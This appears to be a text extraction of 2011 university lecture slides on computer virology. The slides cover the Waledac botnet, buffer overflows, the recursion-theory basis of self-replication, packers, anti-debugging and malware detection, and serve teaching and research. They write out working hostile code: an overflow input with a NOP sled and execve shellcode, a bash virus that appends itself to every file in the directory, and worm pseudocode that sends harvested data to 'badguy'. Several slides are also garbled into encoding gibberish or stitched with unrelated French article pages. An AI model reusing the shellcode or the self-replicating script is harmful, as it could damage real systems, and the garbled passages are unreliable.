88
An introduction to Computer Virology Jean-Yves Marion LORIA Université de Nancy [email protected] 1 mardi 20 décembre 2011

An introduction to Computer Virology · An introduction to Computer Virology Jean-Yves Marion LORIA Université de Nancy [email protected] mardi 20 décembre 2011 1

  • Upload
    lydat

  • View
    215

  • Download
    0

Embed Size (px)

Citation preview

An introduction to Computer Virology

Jean-Yves MarionLORIAUniversité de Nancy

[email protected]

1mardi 20 décembre 2011

Some great stories !?Stuxnet

Waledac

GhostNet2mardi 20 décembre 2011

What is a malware ?

• A malware is a program which has malicious intentions

• A malware is a virus, a worm, a spyware, a botnet ...

• Giving a mathematical definition is difficult

✴ So how it works ?

3mardi 20 décembre 2011

How do infections by malware work ?

Social engineering

Vulnerabilities

Infections

Infections

Mutations

You can’t patch stupidity

Bugs are un-avoidable

4mardi 20 décembre 2011

A case Study : Waledac

• Waledac is a botnet

• The goal is to send spams

5mardi 20 décembre 2011

Social engineering

Page 3 of 66

INFILTRATING WALEDAC BOTNET’S COVERT OPERATIONS: EFFECTIVE SOCIAL ENGINEERING, ENCRYPTED HTTP2P COMMUNICATIONS,

AND FAST-FLUXING NETWORKS

SOCIAL ENGINEERING TECHNIQUES SEEN

WALEDAC recently used the Christmas 2008 holidays for its social engineering ploy when we first spotted it. It has changed its social engineering tactic of spamming on holidays and in relation to current economic events seven times. Appendix A chronicles the social engineering techniques we have seen this botnet use throughout its lifetime.

In addition to tricking users to run malware on their computers, WALEDAC also consistently populates inboxes with pharmaceutical (pharma) spam—spam that advertise Viagra, Cialis, and other similar sexual-enhancement drugs. However, there are times when WALEDAC spews out spam that are neither pharmaceutical in nature nor carry other malware. This suggests that it may have been hired by third parties or clients as a spamming service. These regular WALEDAC spam are also documented in detail in Appendix B.

The timeline shown in Figure 2 summarizes the WALEDAC activities seen so far.

Figure 2. Timeline of WALEDAC activities

Page 34 of 66

INFILTRATING WALEDAC BOTNET’S COVERT OPERATIONS: EFFECTIVE SOCIAL ENGINEERING, ENCRYPTED HTTP2P COMMUNICATIONS,

AND FAST-FLUXING NETWORKS

APPENDIX A

WALEDAC Social Engineering Tactics

At the time this report was written, WALEDAC was seen to have used eight social engineering attacks in an effort to make would-be victims run the malware. WALEDAC started out with the Christmas Ecard ploy.

Figure 1. Christmas ecard spam

Figure 2. Christmas ecard website

Page 36 of 66

INFILTRATING WALEDAC BOTNET’S COVERT OPERATIONS: EFFECTIVE SOCIAL ENGINEERING, ENCRYPTED HTTP2P COMMUNICATIONS,

AND FAST-FLUXING NETWORKS

With the U.S. presidential election flurry coming to a crescendo in January 2009, WALEDAC started sending out spam for its new campaign. The email campaign then carried the bad news that “Obama refused to be the next president.”

Figure 5. WALEDAC email carrying the news that Obama refuses to be the next U.S. president

Figure 6. WALEDAC rips text off from Obama’s website,

bearing false news that he no longer wants to be the president

After taking advantage of Obama’s presidential campaign, WALEDAC then turned its sights to Valentine’s Day.

6mardi 20 décembre 2011

Waledac

• Use of a dropper

• Confickers or other malware are used to install waledac

• Binaries are packed with UPX and homemade packers

• Encryption technologies : RSA & AES (openSSL)

• Send emails from templates

• Scan files to find email addresses and password

• Download binaries and update itself

7mardi 20 décembre 2011

An email template

Received:  from  %^C0%^P%^R3-­‐6^%:qwertyuiopasdfghjklzxcvbnm^%^%([%^C6%^I^%.%^I^%.%^I^%.%^I^%^%])  

by  %^A^%  with  Microsoft  SMTPSVC(%^Fsvcver^%);  %^D^%  From:  "%^Fmynames^%  %^Fsurnames^%"  <%^Fnames^%@%^V1^%>  User-­‐Agent:  Thunderbird  %^Ftrunver^%  To:  %^0^%  Subject:  %^Fjuly^%  

http://%^P%^R26^%:qwertyuiopasdfghjklzxcvbnmeuioa^%.%^Fjuly_link^%/^%

8mardi 20 décembre 2011

Packer codes

Two different versions obtained after a few hours 9mardi 20 décembre 2011

3-tier movie of an attack

social engineeringtargeted attack

client-side exploit

Install malware

a dropper

10mardi 20 décembre 2011

Software bugs

11mardi 20 décembre 2011

Software Bugs (client side exploit)

• Data are programs

• Bugs are doors if there are exploitable (0-days)

• A no bug system is safe

• But systems contain bugs ... and bug-free programs do not exist as a

consequence of the undecidability of the halting problem (Turing)

12mardi 20 décembre 2011

Vulnerabilities : a buffer-overflow

void vulnerable(char *user_data) {   char buffer[4];   strcpy(buffer, userdata);}

buffer

EIP

EBP

...

...

...

Stack

vulenrable(«AAAAAAAAAAAAAAAA\xec\xf2\xff\xbf\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/ls»)

\x90\x90

\xE000

\x90\x90

\x90\x90

\xFFF0

13mardi 20 décembre 2011

Vulnerabilities : a buffer-overflow

void vulnerable(char *user_data) {   char buffer[4];   strcpy(buffer, userdata);}

buffer

EIP

EBP

...

...

...

Stack

\x90\x90

\xE000

\x90\x90

\x90\x90

\xFFF0

return at the address FFF0

14mardi 20 décembre 2011

Bugs

• A buffer-overflow transforms a program in a self-modifying program

Wave 2

Wave 1Wave 1

Wave 2 is the code created by buffer overflow in wave 1

15mardi 20 décembre 2011

What is a malware ?

• Infect systems by self-replication

• Mutation

• Protect itself

• Obfuscation

• Self-modification

• Detection

• Undecidable

Pourquoi tracer ? (1/3)

Definition : l’analyse binaire, c’est

• de l’analyse de programme

• ou le programme est inconnu

=⇒ on a juste un blob binaireRaisons :

• sauts indirects=⇒ flot de controle indecidable

• lectures/ecritures indirectes=⇒ flot de donnees indecidable

• code auto-modifiant=⇒ syntaxe indecidable

3 / 32

16mardi 20 décembre 2011

Outline

• Foundation 1 : Self-replication

• Foundation 2 : Self-modification

• Detection

• Detection by string matching

• Behavioral detection

• Botnet neutralization

17mardi 20 décembre 2011

Foundation 1 : Self-Replication

18mardi 20 décembre 2011

Self-replicating Cellular automaton

Von Neumann (1952), Burke

Codd, Langton

19mardi 20 décembre 2011

Cohen’s formalization (1985)Recursion

theorems as afoundation of

computer virology

Viruses andworms

ILoveYou

State of the art

A more abstractapproach

Abst Virology

Weak recursionBlueprint Distributions

Strong recursionExternal polymorphism

Extendedrecursionfixed polymorphism

Explicit recursionInternal polymorphism

Reproduction throughvectors

Detection

Conclusion

Cohen’s Virus (1985)

� Consider Turing Machine M� and a Viral set V� When a TM M reads v ∈ V , M produces v � ∈ V� (M, V ) is a description of a virus

v1 v2 ... vn v’1 v’2 v’m...

20mardi 20 décembre 2011

Self-Replication

• A virus has self-replicating capacity

• Reflexive property of programming language based on a

• Pointer mechanism to program code, e.g. $0

# for each f i l e FName in the current pathfor FName in ∗ ;do# i f FName i s not mei f [ $FName != $0 ] ; then# add myse l f a t the end o f FNamecat $0 >> $FNamef i

done

Figure 2: An example of ecto-symbiote

We see that by iterating this virus, it will make copies of itself until the

system runs out of memory.

The word “organism” comes from the terminology of Adleman in [1].

There, he proposed to study such viruses, which was not captured by his

formalization, as we shall see shortly. Organisms were a concern of Adleman.

Let us cite him [1], “It may be appropriate to study ‘computer organisms’ andtreat ‘computer viruses’ as a special case”. Our formalism allows a uniform

study of both concepts.

4.5 Companion viruses

A companion virus is an entity which does not modify the functional be-

havior of the target program at first glance. When one executes the target

program, the companion virus runs first, and then calls the target program.

An example of a companion virus is presented in Figure 3.

A companion virus satisfies an equation of the form

ϕv(p) = v�where ∀x ∈ D, ϕv�(x) = ϕp(ϕv(x))

Again, Theorem 3 gives solutions to this construction. Indeed, let q be a

program for the (composition) function comp(a, b, x) = ϕa(ϕb(x)). Solutions

of the above equation are the ones of the following equation.

ϕv(p) = S(q,p,v)

Indeed, ϕS(q,p,v)(x) = ϕp(ϕv(x)).

4.6 Implicit virus Theorem

We establish a virus construction which performs several actions depending

on some conditions on its arguments. This construction of trigger viruses is

9

21mardi 20 décembre 2011

Self-Replication

• Program encoding (Ken Thompson «Reflections on trusting Trust», CACM84)

• See also quines

main() { char *s="main() { char *s=%c%s %c; printf(s,34,s,34); }"; printf(s,34,s,34);}

22mardi 20 décembre 2011

Self-Replication

• Fixed point combinators (functional programming languages)

• Computability : Recursion theorem of Kleene (1938)

• See book of N.D Jones for a programming point of view

• See books of Rogers or P. Odifreddi for a computability point of view

• See marvelous books of R. Smullyan ...

Y F = Y (Y F )

23mardi 20 décembre 2011

A compilation point of view

•Open an email attachment by social engineering

•X scans for informations

•X extracts a list of email address of targeted peoples

•X sends copy of itself by email

A worm X scenario

24mardi 20 décembre 2011

WormX(v,out){ info := extract(out); send(«badguy»,info); @bk := findAddress(out); send(@bk,v); }

Worm X specification

How to compile Worm X ?

send informationfind email address

send worm X to @bk

extract information

25mardi 20 décembre 2011

Program Semantics Recursion

theorems as a

foundation of

computer virology

Viruses and

worms

ILoveYou

State of the art

A more abstract

approach

Abst Virology

Weak recursion

Blueprint Distributions

Strong recursion

External polymorphism

Extended

recursion

fixed polymorphism

Explicit recursion

Internal polymorphism

Reproduction through

vectors

Detection

Conclusion

Semantics

�_� : Programs×D∗ → D∗

where a value of D∗ is a system environment.

From the above example

�send�([email protected],�� Hello��, Out)

= cons(cons([email protected],�� Hello��), Out)

Where Out is an output stream.

is the value of P on the environment d�P �(d)

26mardi 20 décembre 2011

Solve a fixed point equation

Recursiontheorems as afoundation of

computer virology

I Always Love You

Suppose that out is a system entry point,A specification of ILoveYou is:

love(v,out) {info := find(out); // find informationsout := send(cons(‘‘[email protected]’’,nil),info);@bk := extract(out); //extract addressesout := send(@bk,v); //send virus to @bkreturn out;}

v should behave as ILoveYou if:

!W "(out) = !WormX"(W,out)

We have to solve a fixed point equation :

W is a worm satisfying the specification WormX

27mardi 20 décembre 2011

If p is a program, then there is a program e such that:

Kleene’s recursion theorem

Recursiontheorems as afoundation of

computer virology

Kleene’s recursion theorem

A general solution to fixed point equations is given byTheorem (Kleene (1938))If p is a program, then there is a program e such that

!e"(x) = !p"(e, x)

A solution of IloveYou equation

!v"(out) = !love"(v,out)

Set v = e where p = Love.

Proof:

�q�(y, x) = �p�(�d�(y), x)

�d(q)�(x) = �q�(q, x) �d�(q) = �p�(�d�(q), x)

e = d(q)

�d(x)�(y) = �x�(x, y)

28mardi 20 décembre 2011

Malware construction from a specification

Recursiontheorems as afoundation of

computer virology

I Always Love You

Suppose that out is a system entry point,A specification of ILoveYou is:

love(v,out) {info := find(out); // find informationsout := send(cons(‘‘[email protected]’’,nil),info);@bk := extract(out); //extract addressesout := send(@bk,v); //send virus to @bkreturn out;}

v should behave as ILoveYou if:

!W "(out) = !WormX"(W,out)Kleene fixed point is a solution of

Kleene recursion theorem:If p is a program, then there is a program e such that:

Recursiontheorems as afoundation of

computer virology

Kleene’s recursion theorem

A general solution to fixed point equations is given byTheorem (Kleene (1938))If p is a program, then there is a program e such that

!e"(x) = !p"(e, x)

A solution of IloveYou equation

!v"(out) = !love"(v,out)

Set v = e where p = Love.We can construct a virus, which satisfies a given specification.

29mardi 20 décembre 2011

Self-replicating malware compiler

There is a compiler Comp such that W is the worm satisfying the specification Worm:

Recursiontheorems as afoundation of

computer virology

Viruses andworms

ILoveYou

State of the art

A more abstractapproach

Abst Virology

Weak recursionBlueprint Distributions

Strong recursionExternal polymorphism

Extendedrecursionfixed polymorphism

Explicit recursionInternal polymorphismReproduction throughvectors

Detection

Conclusion

I Always Love YouSuppose that out is a system entry point,A specification of ILoveYou is:love(v,out) {info := find(out); // find informationsout := send(cons(‘‘[email protected]’’,nil),info);@bk := extract(out); //extract addressesout := send(@bk,v); //send virus to @bkreturn out;}

v should behave as ILoveYou if:

!W "(out) = !WormX"(W,out)

!Comp"(Worm) =W!W"(out) = !Worm"(W,out)

30mardi 20 décembre 2011

Self-replication with mutations

We can generate malware which satisfies the specification Worm, and mutates at each execution automatically

where Mutate is a code mutation procedure

Recursiontheorems as afoundation of

computer virology

Viruses andworms

ILoveYou

State of the art

A more abstractapproach

Abst Virology

Weak recursionBlueprint Distributions

Strong recursionExternal polymorphism

Extendedrecursionfixed polymorphism

Explicit recursionInternal polymorphismReproduction throughvectors

Detection

Conclusion

Some historical facts

!e"(out) = !Worm"(Mutate(e),out)

! 1983 : the first official virus pn Vax-PDP 11! 1988 : The first worm which infects 6000 machines! 1990 :Dark Avenger mutation engine (Bulgaria)! 1995 : macro virus! 2000 : Worm “I Love You”! 2001 : Palm pilot virus! 2004: Cell phone viruses

The construction of e is given by Kleene’s theorem.

31mardi 20 décembre 2011

Self-replicating compiler with mutations:

There is a compiler Comp such that for all worm specification Worm and mutation procedure Mutate :

Recursiontheorems as afoundation of

computer virology

Viruses andworms

ILoveYou

State of the art

A more abstractapproach

Abst Virology

Weak recursionBlueprint Distributions

Strong recursionExternal polymorphism

Extendedrecursionfixed polymorphism

Explicit recursionInternal polymorphismReproduction throughvectors

Detection

Conclusion

Some historical facts

!e"(out) = !Worm"(Mutate(e),out)

!Comp"(Worm) =W!W"(out) = !Worm"(Mutate(W),out)

! 1983 : the first official virus pn Vax-PDP 11! 1988 : The first worm which infects 6000 machines! 1990 :Dark Avenger mutation engine (Bulgaria)! 1995 : macro virus! 2000 : Worm “I Love You”! 2001 : Palm pilot virus! 2004: Cell phone viruses

32mardi 20 décembre 2011

References

• PhD thesis of F. Cohen

• L. Adleman (1988) which coins the word «virus»

• Guillaume Bonfante, Matthieu Kaczmarek, Jean-Yves Marion: On Abstract Computer Virology from a Recursion Theoretic Perspective. Journal in Computer Virology (3-4): 45-54 (2006)

A Virus is a Virus, Lwoff

33mardi 20 décembre 2011

Foundation 2 : Self-modifications

34mardi 20 décembre 2011

A data is a code

Today’s computers are built from two key principles:

1) Instructions are represented as numbers

2) Programs can be stored in memory to be read or written just as numbers

(Patterson & Hennessy)

35mardi 20 décembre 2011

Applications of self-modifying programs

• Malware mutations

• Code protection (digital rights)

• Compression and packers

• Just in Time compilers

36mardi 20 décembre 2011

A simple self-modifications

n + 1n

A simple decryption loop

Wave 2

Wave 1

jnz @b

{@a,@b,@c,@d}

{@offset}

37mardi 20 décembre 2011

Ex: Packer UPX

Wave 2

Wave 1

UPX (Packer)

Hello.exe

38mardi 20 décembre 2011

Another example of self-modification

Proxy = { X:= Read();

eval(X);} An external input is run

An interpreter of a known or unknown language is used to execute some data

39mardi 20 décembre 2011

Analyzing self-modifying programs

• Complex to design and to analyze

• Program flow may change

• Usual in semantics program and data are separatedRecursion

theorems as afoundation of

computer virology

Viruses andworms

ILoveYou

State of the art

A more abstractapproach

Abst Virology

Weak recursionBlueprint Distributions

Strong recursionExternal polymorphism

Extendedrecursionfixed polymorphism

Explicit recursionInternal polymorphismReproduction throughvectors

Detection

Conclusion

Some historical facts

P ! ! " !!

!e"(out) = !Worm"(Mutate(e),out)

!Comp"(Worm) =W!W"(out) = !Worm"(Mutate(W),out)

! 1983 : the first official virus pn Vax-PDP 11! 1988 : The first worm which infects 6000 machines! 1990 :Dark Avenger mutation engine (Bulgaria)! 1995 : macro virus! 2000 : Worm “I Love You”! 2001 : Palm pilot virus! 2004: Cell phone viruses

Define by structural induction on P :

40mardi 20 décembre 2011

Dynamic analysis of self-modifying programs

• Instrument a program

• Monitor read R, write W memory access and memory execution X

• We follow nested self-modifying

• We detect some code protection

• We detect code patterns

• code decryption

• Integrity checking

• ....

41mardi 20 décembre 2011

AC ProtectExemple (3/5)

• hostname packe avec ACProtect

42mardi 20 décembre 2011

ThemidaExemple (4/5)

• hostname packe avec Themida

43mardi 20 décembre 2011

Experiments with TraceSuferResultats experimentaux 1/3

• Nombre de vagues de code detectees sur l’ensemble des binaires◦ max : 56 vagues

24 / 32

Number of waves detected - max=56

95 613 Binaries, 80% of success, 1400 binaries/h

TraceSurfer based on Pin (Intel)

44mardi 20 décembre 2011

Related works

• TraceSufer based on PIN (INTEL)

• Bitblaze (Berkeley) : TEMU, VINE, ...

• DynamoRio, Ether, Metasm

• Data tainting related methods

45mardi 20 décembre 2011

Malware detection

46mardi 20 décembre 2011

Malware detection by string scanning

• Signature is a regular expression denoting a sequence of bytes

Worm.YYour mac is now under our control !

• Signature : «Your * is now under our control

Worm.YYour PC is now under our control !

47mardi 20 décembre 2011

Malware detection by string scanning

• Signature is a regular expression denoting a sequence of bytes

• Data base of known signatures

Source : Filiol

Toute reproduction sans autorisation du Centre français d’exploitation du droit de copieest strictement interdite. – © Editions T.I. H 5 440v2 – 9

______________________________________________________________________________________________________________ VIRUS INFORMATIQUES

– en mode dynamique : l’antivirus est en fait résident et surveilleen permanence l’activité du système d’exploitation, du réseau etsurtout de l’utilisateur. Il prend la main avant toute action et tentede déterminer si un risque viral existe, lié à cette action. Ce modeest gourmand en ressources et nécessite des machines relative-ment puissantes pour ne pas être handicapant et pousser l’utilisa-teur (cas trop souvent rencontré) à désactiver ce mode au profit duprécédent.

Les antivirus modernes, pour les plus efficaces, sont supposésconjuguer plusieurs techniques (programmées dans des modulesdénommés moteurs) afin de réduire le risque au minimum. Ellespeuvent être classées en deux groupes :

• l’analyse de forme, communément appelée recherche designatures. Cette dernière appellation est en réalité improprecar elle ne considère qu’une approche très restreinte de l’ana-lyse de forme, laquelle regroupe de nombreuses techniques.L’analyse de forme consiste à analyser un code vu commeune séquence de bits ou d’octets, hors de tout contexted’exécution. Cette analyse est fondée sur la notion deschéma de détection ([9] chapitre 2) , composéd’un motif de détection (relativement à un code mal-veillant ) et d’une fonction de détection . Il s’agit alors derechercher de différentes manières (caractérisées par la fonc-tion de détection), relativement à une ou plusieurs bases(ensemble de schémas de détection), des chaînes de bits oud’octets , à la structure plus ou moins complexe, réperto-riées dans ces bases comme caractéristiques d’un code mal-veillant donné ;

• l’analyse comportementale dans laquelle un fichierexécutable est analysé dans son contexte d’exécution. Ils’agit d’une détection fonctionnelle – ce sont les« comportements » ou les actions du code qui sont étudiées.Dans ce contexte, la détection se fonde alors sur la notion destratégie de détection [9].

Comme le montre cette définition, la notion de stratégie dedétection est en fait plus large que celle de schéma de détection.

2.2.1 Techniques ant ivirales par analyse de formeEssentiellement quatre techniques principales peuvent être

citées.

2.2.1.1 Recherche de signatures ou scanningDans le cas le plus trivial (et le plus fréquent), cela consiste à

rechercher une suite de bits, caractéristiques d’un virus donné,analogue pour la police, à l’empreinte digitale. Dans le cas général,la notion de schéma de détection s’applique. Malheureusement,l’étude des principaux produits antiviraux actuels ([9] chapitre 2)montre que les motifs de détection et les fonctions de détectionutilisés sont les plus triviaux – et donc les plus faibles – que l’onpuisse imaginer. La raison tient au fait que tout autre choixtechnique risque de se traduire par une consommation intolérabledes ressources de l’utilisateur, et donc de ne pas êtrecommercialement viable.

Le motif de détection ne doit théoriquement pas incriminer unautre virus tout en possédant une taille et des caractéristiquessuffisamment pertinentes pour ne pas provoquer de faussesalarmes (la probabilité de trouver une séquence donnée de n bitsest inversement proportionnelle à 2n) ([9] chapitre 2). Cette signa-ture peut être une séquence d’instructions plus ou moinscomplexe, établie par l’analyste du code selon différents critères,un message affiché par le virus ou bien tout simplement la signa-ture que le virus lui-même utilise pour éviter la surinfection d’unexécutable. Le problème avec la recherche par signature estqu’elle est facilement contournable (une simple modification d’unoctet suffit). Elle ne permet pas de gérer efficacement les viruspolymorphes ou les virus chiffrés (à moins de considérer des fonc-tions de détection moins triviales que la fonction ET, et encoremoins les virus inconnus. Le taux de fausses alarmes est théo-riquement faible si la signature n’est pas trop limitée en taille.

Le principal problème de ce mode de détection est la nécessitéde maintenir la base de signatures virales avec les contraintes quecela comporte : taille de la base, stockage sécurisé (des sitesd’antivirus contenant les bases de signatures de leurs produitssont quelquefois attaqués), distribution sécurisée, mise à jour plusou moins régulière et effective par l’utilisateur, souvent négligeant.Actuellement, la fréquence de mise à jour d’un antivirus est de plu-sieurs fois par semaine à plusieurs fois par jour. À noter que lamise à jour de ces bases permet la détection de nouveaux virus ouvers, mais aussi dans certains cas, d’améliorer la détection des

Définition 5 : stratégie de détectionUne stratégie de détection relativement à un code malveillant

donné est le triplet :

avec ensemble d’octets,ensemble de fonctions de programme,

fonction booléenne dite dedétection.

!" !# #= { , }f!#

# f#

!#

#

#

"! ! $# # #= { , , }f

!#

$#

f# :! ! !2 2! $# #! " 2

Tableau 1 – M otif viral de I-Worm.Bagle.P

ProduitTaille

signature(en octets)

Signature(indices)

Avast 8 12,916 " 12,91912,937 " 12,940

AVG 14,575 533 " 536 - 538 - ...Bit Defender 8,330 0 - 1 - 60 - 128 - 129 - 134 - ...

Dr Web 6,169 0 - 1 - 60 - 128 - 129 - 134 - ...eTrust/Vet 1,284 0 - 1 - 60 - 128 - 129 - 134 - ...

eTrust/Inoculate IT 1,284 0 - 1 - 60 - 128 - 129 - 134 - ...

F-Secure 2005 59 0 - 1 - 60 - 128 - 129 - 546 - ...

G-Data 54 0 - 1 - 60 - 128 - 129 - 546 - ...KAV Pro 59 Identique à celle de F-Secure 2005McAfee

2006 12,127 8 0 - 1 - 60 - 128 - 129 - 134 - ...

NOD 32 21,849 0 - 1 - 60 - 128 - 129 - 132 - 133 - ...Norton 2005 6 0 - 1 - 60 - 128 - 129 - 134

Panda Tit. 2006 7,579 0 - 1 - 60 - 134 - 148 - 182 - 209...

Sophos 8,436 0 - 1 - 60 - 128 - 129 - 134 - 148...Trend

Office Scan 88 0 - 1 - 60 - 128 - 129 - ...

Exemple : considérons la détection d’un ver récent et connucomme le ver Bagle.P. La liste des différents motifs de détection estdonnée dans le tableau 1 . La fonction de détection est la fonctionlogique ET. Cela signifie que pour que le ver soit détecté, les octetsplacés aux indices donnés dans le tableau aient une valeur parti-culière. Si un seul de ces octets est modifié, le ver n’est plus détecté.

Worm.Bagle.P:

48mardi 20 décembre 2011

Malware detection by string scanning

• Signature are quasi-manually constructed

• Vulnerable to malware protections

➡ Mutations

➡ Code obfuscations

Pros :

Cons :

• Accuracy: low rate of false positive

➡ programs which are not malware are not detected

• Efficient : Fast string matching algorithm

➡ Karp & Rabin, Knuth, Morris & Pratt, Boyer & Moore

49mardi 20 décembre 2011

Detection by integrity check

• Identify a file using a hash function

• Cons :• File systems are updated, so numerical fingerprints change• Difficult to main in practice• Files may change with the same numerical fingerprint (due to hash fct)

Hash functionFiles Hash numbers

a

b

numerical fingerprints

50mardi 20 décembre 2011

Behavioral analysis

• Monitor program interactions (sys calls, network calls, ...)

• Detection of program behavior from execution traces

• Functionalities are expressed at high level

Trace automata

Introduction

Trace abstraction• Behavior patterns• Abstracting byreduction• Trace automata• Regular abstraction

Malicious behaviordetection

Experiments

Conclusion

12 / 22

• Trace language of a program: generally undecidable.

• Approximation by a regular language: using trace collectionor static analysis.

=! A trace automaton is a finite state approximation of some tracelanguage.

GetLogicalDriveStrings

IcmpSendEcho GetDriveType FindNextFileFindFirstFile

GetDriveType FindFirstFile

FindFirstFile FindNextFile

FindNextFile

• Information leak can be detected• Cons :

• Today behavioral analysis is dynamic, which implies to monitor all processes, or run programs in sandboxes.

• It slows down the system

51mardi 20 décembre 2011

Code protection

1.Obfuscation

2.Cryptography

3.Self-modification

4.Anti-analysis tricks

Detection is hard because malware are protected

52mardi 20 décembre 2011

Protections: Self-Modification and Obfuscation

• A lot of malware families use home-made obfuscations, like packers to protect their binaries, following a standard model.

• The obfuscation mechanism is automatically modified for each new distributed binary.

!"#$%&'(#)($*+,

- .&( &/ 01.213# /104.4#5 65# "&0#7018#91:;#35 (& 93&(#:( ("#43 <4'134#5= /&..&24'> 15(1'8138 0&8#.?

!"# 6'91:;4'> :&8# 45 16(&01(4:1..@ 0&84/4#8 /&3#1:" '#2 845(34<6(#8 <4'13@A

B

C34>4'1.<4'13@

D'91:;4'>$:&8#

EF

CEF

!349&6)?$G#H#35#7#'>4'##34'>$&/$01.213#$91:;#35$/&3$86004#5$7 I##9J#: BK+K$

• For a human analyst, it is very hard to understand an obfuscated code

53mardi 20 décembre 2011

Win32.Swizzor Packer!"#$%&'()*(+'#,-.(/0(1-0#"'2.3#-

445"36#,7*(8&9&":&;&-<3-&&"3-<(#0('2%=2"&(62>?&":(0#"(@,''3&:(; A&&6B&> )C4C(

54mardi 20 décembre 2011

Protections: Self-Modification and Obfuscation

• A lot of malware families use home-made obfuscations, like packers to protect their binaries, following a standard model.

• The obfuscation mechanism is automatically modified for each new distributed binary.

!"#$%&'(#)($*+,

- .&( &/ 01.213# /104.4#5 65# "&0#7018#91:;#35 (& 93&(#:( ("#43 <4'134#5= /&..&24'> 15(1'8138 0&8#.?

!"# 6'91:;4'> :&8# 45 16(&01(4:1..@ 0&84/4#8 /&3#1:" '#2 845(34<6(#8 <4'13@A

B

C34>4'1.<4'13@

D'91:;4'>$:&8#

EF

CEF

!349&6)?$G#H#35#7#'>4'##34'>$&/$01.213#$91:;#35$/&3$86004#5$7 I##9J#: BK+K$

• For a human analyst, it is very hard to understand an obfuscated code because not all the code lines are meaningful and because x86 semantics is very tricky.

• One problem is the absence of high level abstraction to structure and understand obfuscated codes.

55mardi 20 décembre 2011

Code protection

1.Obfuscation

2.Cryptography

3.Self-modification

4.Anti-analysis tricks

Detection is hard because malware are protected.

Some interesting protection methods:

56mardi 20 décembre 2011

Obfuscation

• Function calls

✦ A function has a purpose

✦ Divide and conquer approach by understanding function purposes

!"#$%&'()*(+$,&-.&(/0(1&2,3%4(,&&-5(63789:&;&%(+$,<"2.<3#-,

=>?"3@#AB*(C&;&",&9&-73-&&"3-7(#0('2%D2"&(@2.E&",(0#"(FA''3&,(9 G&&@H&. >I=I(

J& %3E& <# 2-F .#'@%3.2<&F@"#$%&',KL- 2 ,<2-F2"F $3-2"4*

?83,(3,(2(0A-.<3#-M(J&(.2-(<8A,(.#-,3F&"(<8&(.#F&(

KKK• Higher degree of abstraction

• There are a lot, a lot of other obfuscation methods ...

57mardi 20 décembre 2011

Obfuscation

• but in malware’s world, what is the purpose of a function call ?

!"#$%&'()*(+$,&-.&(/0(1&2,3%4(,&&-5(63789:&;&%(+$,<"2.<3#-,

=)>"3?#@A*(B&;&",&9&-73-&&"3-7(#0('2%C2"&(?2.D&",(0#"(E@''3&,(9 F&&?G&. HI=I(

J@< 3- #@" C#"%EK C& .2- 82;&*

58mardi 20 décembre 2011

Code protection

1.Obfuscation

2.Cryptography

3.Self-modification

4.Anti-analysis tricks

59mardi 20 décembre 2011

Cryptography

• The dropper of Agobot botnet

60mardi 20 décembre 2011

61mardi 20 décembre 2011

http://quequero.org/AgoBot_Botnet_Reverse_Engineering

62mardi 20 décembre 2011

Code protection

1.Obfuscation

2.Cryptography

3.Self-modification

4.Anti-analysis tricks

63mardi 20 décembre 2011

Self-modification

• Packers ... already seen previously ...

64mardi 20 décembre 2011

Code protection

1.Obfuscation

2.Cryptography

3.Self-modification

4.Anti-analysis tricks

65mardi 20 décembre 2011

Anti-debuging tricks

MOV EAX,-1

INT 2E

CMP WORD PTR DS:[EDX-2],2ECD

• Call interruption 2E with an invalid EAX value

• Normal behavior : EDX contains the address of the next instruction

• Test if EDX-2 points to the opcode of INT 2E, which is 2ECD

• If a debugger is running, then EDX is equal to 0xFFFFFFFF

66mardi 20 décembre 2011

Consequences of Code protection

1. Difficult for a human analyst to understand a malware code

1. Ollydbg

2.IDA Pro

67mardi 20 décembre 2011

!

Welcome in Swizzorland !!

68mardi 20 décembre 2011

Consequences of Code protection

1. Difficult for a human analyst to understand a malware code

1. Ollydbg

2.IDA Pro

2.Difficult to design automatic tools

1.Static analysis

• Abstract interpretation

2.Dynamic analysis

69mardi 20 décembre 2011

70mardi 20 décembre 2011

A cruel world

Theorem : Let v be a virus. The set of viruses which are obtained from v by mutation is not decidable (computable).

A consequence of Rice theorem

Theorem (RICE): Let P be a non-trivial computable property.

Then the set of programs which satisfies P is not decidable.

Idea of the proof : Construct a reduction from the halting problem.

71mardi 20 décembre 2011

Morphological analysis in a nutshell

Signatures are abstract flow graph

Detection of subgraph in program flow graph abstraction

72mardi 20 décembre 2011

Automatic construction of signatures

73mardi 20 décembre 2011

Reduction of signatures by graph rewriting

74mardi 20 décembre 2011

Morphological detection : Results

• False negative

• No experiment on unknown malware

• Signatures with < 18 nodes are potential false negative

• Restricted signatures of 20 nodes are efficient

• Less than 3 sec. for signatures of 500 nodes

75mardi 20 décembre 2011

Conclusion about morphological detection

• Benchmarks are good

• Pro

• More robust on local mutation and obfuscation

